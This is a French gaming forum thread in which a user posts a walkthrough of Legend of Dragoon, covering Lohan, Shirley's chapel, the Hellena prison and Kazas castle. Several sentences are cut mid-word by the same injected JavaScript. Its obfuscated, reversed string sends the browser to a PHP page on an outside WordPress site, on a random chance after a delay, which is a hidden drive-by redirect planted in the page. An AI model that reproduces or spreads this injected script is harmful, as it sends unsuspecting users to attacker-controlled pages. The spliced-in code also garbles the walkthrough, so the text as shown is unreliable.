Solution (en cours)

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yami627
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Re: Solution (en cours)

Message par yami627 »

trop aimable Giuliani XD mais..... mon emulateur refuse de marcher ><..... raaaaaaaaaaaaaaaaah!
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giuliani
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Re: Solution (en cours)

Message par giuliani »

Tu as essayé avec Romstation Et son émulateur intégré?
Ne nous prenons pas trop au sérieux, il n'y aura aucun survivant.
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yami627
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Re: Solution (en cours)

Message par yami627 »

me revoila après un looooooooooooooooooooong moment d'absence et un nouvel émulateur lol

donc il ne me manque plus qu'a revenir a l'antre du dragon (oui il faut que je recommence :( ) et je continu la soluce ^^
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yami627
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Re: Solution (en cours)

Message par yami627 »

Lohan :
4 poussières d'étoiles : dans le sous-sol de la bibliothèque (passez par le panneau secret), sur l'armure dans le magasin de Dabas, dans un panier devant l’arène, dans une jarre près de l'entrée de la ville.
Shana est souffrante, il faut vite l'emmener chez le médecin de Lohan. Celui-ci vous apprend que seule la dragonnie, une plante légendaire, pourrait la soigner. Il vous faut des informations sur cette plante, pour cela, allez chez Dabas, à l'ouest de la ville. Malheureusement, il n'en possède pas mais il en a entendu parler. Apparemment, le groupe pourrait trouver de la dragonie dans une ancienne chapelle ab$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andonné derrière l'antre du dragon. Mais une grosse plante barre la route, de l'eau pur, venant de la source dans l'antre, devrait pouvoir vous en défaire. Pour cela, il vous faut une bouteille vide. Il se trouve qu'un march$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and en vend sur la place du marché. Il vous la propose pour un prix exorbitant ! Dem$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andez toujours à baisser le prix, il finira par vous l'offrir.
Faites une dernière fois le tour des boutiques et direction l'antre du dragon !

Antre du dragon :
Allez à la source purifiante et prenez un peu d'eau. Ensuite, traversez la rivière et dirigez-vous vers la plante que vous aviez trouvé lorsque Shana se sentait mal. Il vous suffit de l'aroser pour qu'elle se fan et vous libère le passage.

Plan : (CTRL+clique sur le liens)
Lohan intérieur et toit
http://i76.servimg.com/u/f76/11/31/35/38/carte_10.jpg
extérieur et arêne
http://i76.servimg.com/u/f76/11/31/35/38/carte_11.jpg
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Re: Solution (en cours)

Message par yami627 »

Chapelle de Shirley :
Ne vous occupez pas des coffres sur votre chemin, ils sont vides. Arrivé à l'entrée de la chapelle, Rose vous dem$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande de sortir vos âmes de dragoons. Elles résonnent, ce qui prouve qu'un dragon n'est pas loin. En allant toujours tout droit, vous tomberez sur un panneau à code. Il faut normalement prendre un wagonnet pour découvrir la combinaison (en allant tout en haut à gauche et en ouvrant le coffre au bout du chemin) mais le code ne change jamais donc je vais vous épargner ceci. Tapez 352 sur le panneau, cela descend une échelle. Prenez là et tournez les statues (or : devant ; argent : gauche) avant de prendre les escaliers.
Au bout du chemin, un homme vous barre la route. Malgré vos explications, il pense que vous êtes venu prendre son trésor et vous attaque.
=Drake : 1220HP – élément vent=
Dés le début du combat, Drake sort 3 bombes de son coffre. Il faut les détruire le plus vite possible car elles font de lourd dégâts. Lorsqu'il sort sa toile, vous ne pourrez pas le toucher tant qu'elle ne sera pas détruite, sauf avec des attaques dragoon. Drake ce soigne qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and il perd la moitié de ses points de vie mais à part cela, il n'est pas compliqué à battre.

Après le combat, un fantôme du nom de Shirley arrive. Elle et Rose semble se connaître. Elle vous apprend qu'il n'y as pas de dragonnie ici mais que vous pouvez sauver Shana avec l'âme de dragoon du dragon d'argent. Mais avant de vous la donner, elle souhaite vous mettre à l'épreuve.
=Shirley : ???HP – élément lumière=
Ceci n'est pas vraiment un combat, il suffit de répondre correctement aux question qu'elle vous pose et de vous défendre en attendant. Voici les bonnes réponses :
-Dart, Lavitz, pourquoi vous battez-vous ?
-Pour protéger nos proches.
-(en Shana) Dart, je t'attendais. Pourquoi es-tu parti sans dire un mot ?
-Traquer le monstre du mal.
-(en Shana) Dart, que feras-tu après avoir trouvé le monstre du mal ?
-Je me vengerai bien sûr.
-(en Shana) Oubli la vengeance et reste avec moi. C'est le monstre du mal ou moi.
-Shana
-(en Albert) Lavitz ! Que fais-tu ici ? Oubli Shana et reviens !
-Ça ne vous ressemble pas !
-(en Albert) Lavitz ! Refuses-tu d'obeïr ? Une vie ou plusieurs ?
-Shana a besoin de moi !
-Dart, la vérité s'accompagnera d'épreuves. Tu veux toujours y aller ?
-J'irai coûte que coûte.
-Lavitz, selon toi qui est la personne la plus importante ?
-Sa Seigneurie
-Réponds à ceci Rose, Qu'est la vie pour toi ?
-Juste un sacrifice.

Après cela, Shirley vous confie l'âme de dragoon et vous dem$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande de soigner Drake. Dans la pièce du fond, vous trouverez beaucoup de coffre, dont un contenant une arme pour Rose. Repartez ensuite vers Lohan.

Plan : (CTRL+clique sur le liens)
http://i76.servimg.com/u/f76/11/31/35/38/carte_13.jpg

Antre du dragon :
Traversez l'antre pour atteindre Lohan.

Lohan :
Foncez à l’hôpital pour soigner Shana. À la surprise générale, elle devient elle aussi une dragoon. Suite à cela, Dart décide de s'inscrire au tournoi de l'homme le plus fort du monde. L'arêne se trouve au bout de la ville, inscrivez-vous et descendez dans les coulisses. Vous y retrouvez un vieil ami de voyages de Dart : Hashel. Pour lancer les combat, parlez à l'homme en jaune.
=Gorgaga : 180HP=
Dès le début du combat, Gorgaga vous empoisonne. Mais ne vous en faites pas, il est très facile à battre.
=Serfius : 200HP – élément feu=
Lorsque cet adversaire aura perdu la moitié de ses HP, sa défense sera doublée.
=Danton : 235HP – élément terre=
Il est plus résistant que les autres, mais pas compliqué. Ne l'attaquez pas lorsqu'il croise les bras et soignez-vous tout de suite après son attaque ultime qui ne vous laisse qu'un seul point de vie.
=Atlow : 310HP – élément ténèbres=
il est plus rapide que vos autres adversaires. Dés le premier tour, il vous attaque deux fois de suite. Mais ne vous en faites pas, vous pourrez le battre facilement.
=Lloyd : ???HP=
Il est impossible de le battre. Il esquivera toute vos attaques. Attendez simplement qu'il vous tue et finissez deuxième du tournoi.

Après le tournoi, retrouvez vos compagnon pour leur présenter Hashel. Lavitz souhaite rapprocher Dart et Shana et les envoi donc s'amuser en leurs donnant 3 tickets. Chaque jeu que vous gagnez vous donnera des ticket. Avec ces tickets vous pourrez acheter quelques objets dans la boutique à l'entrée. Il faut jouer à au moins un jeu avant que Lavitz ne vous propose d'arrêter.
En voulant quitter la ville, vous tombez sur un soldat mourant. Il vous apprend que le roi a été fait prisonnier et emporté à Héléna. Après une courte discussion, le groupe décide d'aller la sauver, accompagné d'Hashel.
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Re: Solution (en cours)

Message par yami627 »

Prison d'Héléna :
Lavitz réussit à passer le pont levis et vous ouvre la voie. Allez tout à gauche pour prendre l'ascenseur autrefois en panne. Continuez à monter jusqu'à arrivé à la salle où vous aviez trouvé la clé de la cellule de Shana. C'est une embuscade ! Vous vous retrouvez prisonnier d'une salle sans issu. Parlez à tous le monde et inspectez le mur. Un léger courant d'air passe par là. Vous n'avez pas le temps de regarder de plus près car un monstre vous attaque :
=Jiango : 1280HP – Terre =
Ce monstre peut attaquer vos trois personnages en même temps et leur lancé le sort confusion. Il est aussi extrêmement résistant. L’absorbions astrale et fortement recomm$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andé pour ce combat.

En mourant, le monstre s’effondre sur le mur et le casse, vous ouvrant un passage. Tuez les quelques gardes sur votre chemin et poursuivez celui qui s'enfuit. Poursuivez jusqu'au point de sauvegarde et dirigez-vous vers le haut de la map. Fruegel vous y attend.
=Fruegel : 1000HP – Terre= Guftas : 500HP – ténèbres= Rodrigue : 380HP – Vent=
Tuez en premier Guftas qui peut vous causer confusion. Ensuite, occupez-vous de Rodrigue. Finissez par Fruegel. Lavitz lui donnera le coup finale.

Après le combat, un homme encapuchonné arrive et s'en prend au roi. Lavitz tente de le sauver mais se fait tuer par l'inconnu qui n'est autre que Lloyd, le vainqueur du tournoi. Malheureusement, il parvient à s'enfuir. Le roi Albert reçoit le pouvoir du dragoon de Lavitz et le remplace dans le groupe.

Plan : (CTRL+clique sur le liens)
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Re: Solution (en cours)

Message par giuliani »

Yes merci Yami ^^

Je suis toujours ça avec intérêt
Ne nous prenons pas trop au sérieux, il n'y aura aucun survivant.
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Re: Solution (en cours)

Message par yami627 »

il faudrait que tu me redonne ton mail pour que je t'envoie toute ça ^^ avec le changement msn => outlook j'ai encore du mal xD
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Re: Solution (en cours)

Message par yami627 »

Château Noir de Kazas :
6 poussières d'étoiles : Dans la garnison, à gauche, entre les tonneaux, dans le service de recrutement, à droite, parmi les armes et les boucliers du grenier, devant le comptoir de la boutique d'arme, sur une étagère de livres, dans la première habitation du fort, dans un tonneau de la taverne du fort, dans un autre tonneau de cette même taverne.
Fouillez la ville pour y trouver des poussières d'étoiles et quelques coffres, une fois fait, dirigez-vous vers l'entrée du château. Deux gardes montent la gardes sur le pont levis, vous décidez de les évitez et d'infiltrer le château furtivement. Allez vers le fond de la map, vous arrivez à un ancien fort transformé en village. Dans la dernière maison, en bas à gauche, un garçon vous interpelle et vous pose trois question. Répondez 3, 3, 2. Il vous laisse passer et vous indique même un passage secret pouvant vous mener au château.
Frayez-vous un chemin, en évitant les gardes (s'ils vous voient, vous les combattez) jusqu'au hall d'entrée (que vous montiez l’échelle ou preniez la porte principale n'as aucune importance). Une fois arrivé, allez tout de suite à droite, vers le centre de recherche. Deux scientifiques vous expliquent leurs recherches et vous donne l'huile permettant de faire fonctionner les ascenseurs. La lumière blanche vous régénère, profitez-en. Prenez ensuite l’ascenseur au fond de la salle (placez de l'huile dans la cavité violette/rose). Une fois à la décharge, traversez la plate-forme en évitant les pierres. Au bout, vous trouverez une pierre rouge. Revenez et cette fois-ci, laissez-vous tomber. Des coffres vous attendent en bas. Revenez dans le hall et prenez l’ascenseur à gauche pour atteindre le laboratoire M.Magi, un scientifiques... un peu fou. Une fois la petite scène finie, allez chercher le coffre au fond, il contient une pierre bleue. Retournez une nouvelle fois dans le hall et prenez l’ascenseur au fond de la salle. Faites le tour du bâtiment pour trouver une arme pour Hashel puis montez là où s’entraîne trois soldats. Battez-les et montez dans l’ascenseur derrière eux. Vous arrivez dans la chambre du capitaine, celui qui a enlevé Shana à Celesse. Il vous explique qu'il ne faisait qu’obéir aux ordres et qu'il regrette. Il vous donne une pierre jaune et vous expliquent que les trois pierres sont en fait une clés qui vous permettra d'atteindre l'empereur. Redescendez et allez à droite. Montez les escaliers, tuez le garde d'élite et prenez la navette. Une fois les coffre ouvert, revenez sur vos pas jusqu'à l'endroit où les trois soldats s’entraînait. L’ascenseur au bout peut maintenant vous emmener au troisième étages. Dans la salle suivante, parlez au Père Faza et placez les pierres sur le socle près du point de sauvegarde. La porte en bas de la statue est maintenant ouverte. Montez par l’ascenseur qui si trouve et continuez votre chemin jusqu'à rencontré une vieille connaissance : Kongol.
=Kongol : 1030HP – Terre=
Cette fois-ci, Kongol possède une armure et est beaucoup plus rapide. Il peut également créer une barrière anti-magie.

Si vous avez subit beaucoup de dégâts, vous pouvez toujours revenir au centre de recherche pour utiliser la flamme blanche. La porte derrière Kongol vous mène à la salle du trône. Doel vous y attends.
=Empereur Doel : 600HP – Tonnerre=
Se combat n'est pas difficile, contentez-vous de la frappez (sans dragoon) jusqu'à ce qu'il se transforme.
=Dragoon Doel : 1800HP – Tonnerre=
Il est rapide et fort. Une fois qu'il aura perdu la moitié de ses points de vie, il se protégera derrière un bouclier magique. Attendez qu'il se dissipe en vous protégeant à chaque tour.

Une fois Doel vaincu, Hashel hérite de son pouvoir de dragoon.

Plan : (CTRL+clique sur le liens)
http://i76.servimg.com/u/f76/11/31/35/38/carte_15.jpg
http://i76.servimg.com/u/f76/11/31/35/38/carte_16.jpg

Fin du chapitre 1 !
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